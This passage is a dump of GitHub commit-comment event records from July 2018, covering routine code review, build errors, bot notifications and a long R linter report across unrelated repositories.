{"id":"7984662382","type":"CommitCommentEvent","actor":{"login":"mirh"},"repo":{"name":"imageguy/fglrx-for-Fedora"},"payload":{"comment":{"id":29754053,"position":null,"line":null,"path":null,"commit_id":"57817204b7c18d2766c477035f64f9a25df1e4d0","created_at":"2018-07-18T18:20:42Z","updated_at":"2018-07-18T18:20:42Z","author_association":"NONE","body":"Git GUI lets you easily amend the last commit. \r\nNow that you fucked up two though, you'll need to rebase/squash :p\r\n\r\nLast but not least, don't foget to force push "}},"created_at":"2018-07-18T18:20:42Z"}
{"id":"7984811990","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29754429,"position":null,"line":null,"path":null,"commit_id":"a6fa6a9e92a19c85bc00c96617f338279243baeb","created_at":"2018-07-18T18:50:38Z","updated_at":"2018-07-18T18:50:38Z","author_association":"NONE","body":"What surprises me are the high number of crashes..."}},"created_at":"2018-07-18T18:50:38Z"}
{"id":"7984606921","type":"CommitCommentEvent","actor":{"login":"imageguy"},"repo":{"name":"imageguy/fglrx-for-Fedora"},"payload":{"comment":{"id":29753926,"position":null,"line":null,"path":null,"commit_id":"57817204b7c18d2766c477035f64f9a25df1e4d0","created_at":"2018-07-18T18:09:51Z","updated_at":"2018-07-18T18:09:51Z","author_association":"OWNER","body":"Oh, duh, thank you! I've re-spun the commit."}},"created_at":"2018-07-18T18:09:51Z"}
{"id":"7984761495","type":"CommitCommentEvent","actor":{"login":"Warpten"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29754321,"position":null,"line":null,"path":null,"commit_id":"f93cb448f1d8b8346dff13fffacfd3c9f85edde0","created_at":"2018-07-18T18:40:36Z","updated_at":"2018-07-18T18:40:36Z","author_association":"MEMBER","body":"gcc/cmake? Uh?"}},"created_at":"2018-07-18T18:40:36Z"}
{"id":"7984578515","type":"CommitCommentEvent","actor":{"login":"thanhpm87"},"repo":{"name":"thanhpm87/dokmee"},"payload":{"comment":{"id":29753850,"position":null,"line":null,"path":null,"commit_id":"8cd721908892397946f354f71ddd286195ea72ff","created_at":"2018-07-18T18:04:13Z","updated_at":"2018-07-18T18:04:13Z","author_association":"OWNER","body":"change index name"}},"created_at":"2018-07-18T18:04:13Z"}
{"id":"7984847334","type":"CommitCommentEvent","actor":{"login":"berkaygure"},"repo":{"name":"akaunting/setting"},"payload":{"comment":{"id":29754513,"position":null,"line":null,"path":null,"commit_id":"5a0dad7ef900fa2b9e919b659df5a0dc200f3fb5","created_at":"2018-07-18T18:57:42Z","updated_at":"2018-07-18T18:57:42Z","author_association":"NONE","body":"@pashamesh solved, thank you."}},"created_at":"2018-07-18T18:57:42Z"}
{"id":"7984833344","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29754483,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-18T18:54:55Z","updated_at":"2018-07-18T18:54:55Z","author_association":"MEMBER","body":"Actually I wouldn't revert it, because it doesn't have any side effects and it may be safer for future modifications. The ```m_controller->action(PA_STEER_LEFT, 0);``` just sets ```m_steer_val = m_steer_val_r``` and it makes sure that ```m_steer_val_l = 0```. Or am i missing something?\r\n\r\nOk I will host a soccer server too.\r\n\r\nBtw. testing if a server is still alive could be useful. So that once per 10 minutes/hour/whatever I can \"ping\" it in the script and automatically restart if needed. It happened for me only once so far (the server was available for LAN connection, but it wasn't available for WAN anymore). But it may happen when internet connection is lost etc."}},"created_at":"2018-07-18T18:54:55Z"}
{"id":"7984854287","type":"CommitCommentEvent","actor":{"login":"pashamesh"},"repo":{"name":"akaunting/setting"},"payload":{"comment":{"id":29754531,"position":null,"line":null,"path":null,"commit_id":"5a0dad7ef900fa2b9e919b659df5a0dc200f3fb5","created_at":"2018-07-18T18:59:02Z","updated_at":"2018-07-18T18:59:02Z","author_association":"CONTRIBUTOR","body":"@berkaygure awesome, pull request is already waiting for merge."}},"created_at":"2018-07-18T18:59:02Z"}
{"id":"7984793025","type":"CommitCommentEvent","actor":{"login":"Kazi-Yako"},"repo":{"name":"Artirigo/react-native-kontaktio"},"payload":{"comment":{"id":29754397,"position":null,"line":null,"path":null,"commit_id":"52e5288b7a337ae5c4ee20abca9220cc1e3df5f8","created_at":"2018-07-18T18:46:51Z","updated_at":"2018-07-18T18:46:51Z","author_association":"NONE","body":"do you have an example for DeviceEventEmitter.addListener on secure profile please? I would like to be able to read Beacon Pros and also get the battery level of eddystone or Ibeacon. \r\nThanks!"}},"created_at":"2018-07-18T18:46:51Z"}
{"id":"7984674758","type":"CommitCommentEvent","actor":{"login":"Shaxzy"},"repo":{"name":"faggotman69/Prometheus---Updated"},"payload":{"comment":{"id":29754108,"position":null,"line":null,"path":null,"commit_id":"7da29ff7e5884f6150b9714d53d0e56e9fca9f90","created_at":"2018-07-18T18:23:14Z","updated_at":"2018-07-18T18:23:14Z","author_association":"NONE","body":"This should be VMT undetected now right?"}},"created_at":"2018-07-18T18:23:14Z"}
{"id":"7984858058","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/front-end-project-week"},"payload":{"comment":{"id":29754543,"position":null,"line":null,"path":null,"commit_id":"2d7afd636b016d8770c11ad6e4f8feaa7dc45a57","created_at":"2018-07-18T18:59:48Z","updated_at":"2018-07-18T18:59:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Edit an existing note](https://trello.com/c/1A0kqY33/4-edit-an-existing-note)"}},"created_at":"2018-07-18T18:59:48Z"}
{"id":"7984858084","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/front-end-project-week"},"payload":{"comment":{"id":29754544,"position":null,"line":null,"path":null,"commit_id":"2d7afd636b016d8770c11ad6e4f8feaa7dc45a57","created_at":"2018-07-18T18:59:48Z","updated_at":"2018-07-18T18:59:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Edit an existing note](https://trello.com/c/1A0kqY33/4-edit-an-existing-note)"}},"created_at":"2018-07-18T18:59:48Z"}
{"id":"7984858711","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29754547,"position":null,"line":null,"path":null,"commit_id":"e4fc4571b0fd7a9d5b61527e18b8650339d3de01","created_at":"2018-07-18T18:59:56Z","updated_at":"2018-07-18T18:59:56Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#ci-9](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#ci-9).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-9-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-18T18:59:56Z"}
{"id":"7984858859","type":"CommitCommentEvent","actor":{"login":"drryanjames"},"repo":{"name":"sacuribraimo/esaude-emr-poc"},"payload":{"comment":{"id":29754548,"position":7,"line":7,"path":"test/e2eTests/pages/socialDashboardPage.js","commit_id":"04e7f6c8642cf2d6809f137b4efe52401f5b77c9","created_at":"2018-07-18T18:59:57Z","updated_at":"2018-07-18T18:59:57Z","author_association":"NONE","body":"This constructor doesn't take any values, but you're passing in values in the derived classes. What you probably want to do here is something like this:\r\n\r\n```constructor(options) {\r\n    super{{\r\n        isLoaded: options.isLoaded,\r\n        components: ['tabs'].join(options.components)\r\n    })\r\n    ...\r\n}\r\n```\r\n\r\nThere's probably a better way to do this with defaults."}},"created_at":"2018-07-18T18:59:57Z"}
{"id":"7984655208","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29754035,"position":null,"line":null,"path":null,"commit_id":"3dd96d817e676edd18d1d5642a58c8095664769d","created_at":"2018-07-18T18:19:19Z","updated_at":"2018-07-18T18:19:19Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-18T18:19:19Z"}
{"id":"7984696143","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":29754157,"position":31,"line":502,"path":"api/src/main/java/com/graphhopper/util/PointList.java","commit_id":"2f9838ba3e9601b1df0163c04a4f910849834d8b","created_at":"2018-07-18T18:27:32Z","updated_at":"2018-07-18T18:27:32Z","author_association":"MEMBER","body":"I would have expected a shallow copy and performance-wise this should be the best, but then the result is immutable too and the test would break as we do \"copiedPl = shallowPl.copy(...)\" and then \"copiedPl.setNode\". And when I thought about this, this makes sense to me too. "}},"created_at":"2018-07-18T18:27:32Z"}
{"id":"7984859321","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754552,"position":23,"line":39,"path":"app/views/devise/registrations/edit.html.erb","commit_id":"e195fa2697054f98731178ddf9de93ac72e10441","created_at":"2018-07-18T19:00:03Z","updated_at":"2018-07-18T19:00:03Z","author_association":"NONE","body":"i think we are repeating these options, don't do that.\r\nuse a helper or define a constant for this."}},"created_at":"2018-07-18T19:00:03Z"}
{"id":"7984867970","type":"CommitCommentEvent","actor":{"login":"Srinivas-Sathyanarayanan"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29754584,"position":24,"line":24,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-18T19:01:42Z","updated_at":"2018-07-18T19:01:42Z","author_association":"OWNER","body":"Got it!! updated the code accordingly with events."}},"created_at":"2018-07-18T19:01:42Z"}
{"id":"7984865571","type":"CommitCommentEvent","actor":{"login":"Srinivas-Sathyanarayanan"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29754571,"position":6,"line":6,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-18T19:01:13Z","updated_at":"2018-07-18T19:01:13Z","author_association":"OWNER","body":"sure, updated accordingly."}},"created_at":"2018-07-18T19:01:13Z"}
{"id":"7984870964","type":"CommitCommentEvent","actor":{"login":"oleavr"},"repo":{"name":"chaitin/passionfruit"},"payload":{"comment":{"id":29754593,"position":16,"line":27,"path":"lib/channels.js","commit_id":"3be4fb1f3aa76c11aa82d09cb0c6a8bc4f50e93d","created_at":"2018-07-18T19:02:19Z","updated_at":"2018-07-18T19:02:19Z","author_association":"CONTRIBUTOR","body":"This appears to be negated compared to before."}},"created_at":"2018-07-18T19:02:19Z"}
{"id":"7984875032","type":"CommitCommentEvent","actor":{"login":"davidbanu"},"repo":{"name":"balance-io/balance-website"},"payload":{"comment":{"id":29754610,"position":null,"line":null,"path":null,"commit_id":"ad4d6796fa5b36c406e0f9b266a43770fdf0f5a2","created_at":"2018-07-18T19:03:10Z","updated_at":"2018-07-18T19:03:10Z","author_association":"NONE","body":"Dead blog post - The blog post 'https://balance.io/blog/blog/building-a-mac-app' had two 'blog' references due to the way code was written. The articles written with Medium didn't had the same problem, the link was build differently for Contentful posts vs Medium posts. "}},"created_at":"2018-07-18T19:03:10Z"}
{"id":"7984875215","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29754611,"position":209,"line":186,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-18T19:03:12Z","updated_at":"2018-07-18T19:03:12Z","author_association":"OWNER","body":"Please check my last commit"}},"created_at":"2018-07-18T19:03:12Z"}
{"id":"7984877452","type":"CommitCommentEvent","actor":{"login":"balcer"},"repo":{"name":"LoEE/lua-cjson"},"payload":{"comment":{"id":29754615,"position":null,"line":null,"path":null,"commit_id":"c723836c21b406fdfd44cb801bddd82d5e43d238","created_at":"2018-07-18T19:03:39Z","updated_at":"2018-07-18T19:03:39Z","author_association":"NONE","body":"I wrote a small test for nested json\r\n\r\n```lua\r\nlocal json = require'cjson'\r\n\r\nprint(json.encode(json.decode(\"{\\\"a\\\":{\\\"aa\\\":12,\\\"ab\\\":15},\\\"b\\\":4}\")))\r\njson.encode_sort_keys(true)\r\nprint(json.encode(json.decode(\"{\\\"a\\\":{\\\"aa\\\":12,\\\"ab\\\":15},\\\"b\\\":4}\")))\r\n```\r\nand it gave this result:\r\n\r\n```\r\n{\"a\":{\"aa\":12,\"ab\":15},\"b\":4}\r\nthb: lua-5.1.5/src/lapi.c:571: lua_rawgeti: Assertion `(((o)->tt) == 5)' failed.\r\n[1]    27048 abort (core dumped)  thb tests.lua\r\n```\r\n"}},"created_at":"2018-07-18T19:03:39Z"}
{"id":"7984882567","type":"CommitCommentEvent","actor":{"login":"feliperenan"},"repo":{"name":"poanetwork/poa-explorer"},"payload":{"comment":{"id":29754630,"position":21,"line":2737,"path":"apps/explorer/lib/explorer/chain.ex","commit_id":"d9129b8d2ae6d98c18f665c31c7cf7c60b1779b4","created_at":"2018-07-18T19:04:40Z","updated_at":"2018-07-18T19:04:40Z","author_association":"CONTRIBUTOR","body":"It didn't work for me - I don't know if I doing something wrong 🙈.\r\n\r\n```\r\nwarning: variable \"t\" does not exist and is being expanded to \"t()\", please use parentheses to remove the ambiguity or change the variable name\r\n  lib/explorer/chain.ex:2730\r\n\r\n== Compilation error in file lib/explorer/chain.ex ==\r\n** (CompileError) lib/explorer/chain.ex:2730: cannot use ^address_hash.bytes() outside of match clauses\r\n    (stdlib) lists.erl:1354: :lists.mapfoldl/3\r\n    (stdlib) lists.erl:1355: :lists.mapfoldl/3\r\n    (stdlib) lists.erl:1354: :lists.mapfoldl/3\r\n    expanding macro: Ecto.Query.where/3\r\ncould not compile dependency :explorer, \"mix compile\" failed. You can recompile this dependency with \"mix deps.compile explorer\", update it with \"mix deps.update explorer\" or clean it with \"mix deps.clean explorer\"\r\n```\r\n\r\nWdty if we do something like this https://github.com/poanetwork/poa-explorer/pull/417/files#diff-138876bcd167a22ec27a92debaf1e76cR2734. ?"}},"created_at":"2018-07-18T19:04:40Z"}
{"id":"7984883821","type":"CommitCommentEvent","actor":{"login":"sportnak"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29754633,"position":341,"line":341,"path":"components/flexgrid/component.jsx","commit_id":"6d0faf84f11f0f161e82f29747ae0f0950797194","created_at":"2018-07-18T19:04:56Z","updated_at":"2018-07-18T19:04:56Z","author_association":"NONE","body":"This will fail if `onGridReady` has not been called yet."}},"created_at":"2018-07-18T19:04:56Z"}
{"id":"7984889281","type":"CommitCommentEvent","actor":{"login":"Srinivas-Sathyanarayanan"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29754646,"position":33,"line":33,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-18T19:06:04Z","updated_at":"2018-07-18T19:06:04Z","author_association":"OWNER","body":"Thanks for bringing this up, but the code as per the comments, can i rewrite the split function as below, by replacing the usage of msg.value with amt as below?\r\n\r\nfunction split(address receiverOne, address receiverTwo)  public  payable returns(bool isSuccessfull){\r\n\t      \tuint amt = msg.value;\r\n\t\t//LogSenderBalance(msg.sender,msg.value);\r\n\t\tLogSenderBalance(owner,amt);\r\n\t\trequire(amt > 0);\r\n\t\t\r\n\t\t//uint remAmt = msg.value % 2;\r\n                 uint remAmt = amt % 2;\r\n\t\t//uint splitAmt = (msg.value - remAmt) / 2;\r\n                 uint splitAmt = (amt - remAmt) / 2;\r\n\r\n\t\tif (remAmt > 0){\r\n\t\t\tbalances[owner] += remAmt;}\r\n\r\n\t\tbalances[receiverOne] += splitAmt;\r\n\t\t\r\n\t\tbalances[receiverTwo] += splitAmt;\r\n\r\n\t\tLogBalance(receiverOne,balances[receiverOne],receiverTwo,balances[receiverTwo]);\t\r\n\r\n\t\treturn true;\r\n\t\r\n\t}\r\n"}},"created_at":"2018-07-18T19:06:04Z"}
{"id":"7984899855","type":"CommitCommentEvent","actor":{"login":"Srinivas-Sathyanarayanan"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29754668,"position":47,"line":47,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-18T19:08:16Z","updated_at":"2018-07-18T19:08:16Z","author_association":"OWNER","body":"Thanks for identifying this Rob, do u mean implementing a stoppable contract?.\r\nCould you plz provide some examples."}},"created_at":"2018-07-18T19:08:16Z"}
{"id":"7984902885","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29754674,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-18T19:08:51Z","updated_at":"2018-07-18T19:08:51Z","author_association":"MEMBER","body":"ok sorry, than can you see if even the m_controller->action(PA_STEER_RIGHT, 0); works in the current controller too? if works good than we can revert this revert\r\n\r\nenet has something called \"intercept\":\r\nhttps://github.com/supertuxkart/stk-code/commit/7200e9e5b\r\n(the above example was never added to stk though)\r\n\r\nso basically if you allow your server port to be forward, you can send a udp packet with string like \"health\", and use the above callback to return something you like to know\r\n"}},"created_at":"2018-07-18T19:08:51Z"}
{"id":"7984906534","type":"CommitCommentEvent","actor":{"login":"uncle-tom"},"repo":{"name":"kirivaha/WP-test"},"payload":{"comment":{"id":29754680,"position":6,"line":6,"path":"blocks/default/loop-default.php","commit_id":"f99df344e446dba47f690976b5828b43413729eb","created_at":"2018-07-18T19:09:36Z","updated_at":"2018-07-18T19:09:36Z","author_association":"NONE","body":"Эм, тут получается статическая дата, она будет на всех записях одинаковая. А функция get_the_date выводит дату создания поста. "}},"created_at":"2018-07-18T19:09:36Z"}
{"id":"7984908502","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29754685,"position":null,"line":null,"path":null,"commit_id":"cdcbd216a82479792f8e745140e12887d0a20939","created_at":"2018-07-18T19:09:59Z","updated_at":"2018-07-18T19:09:59Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* 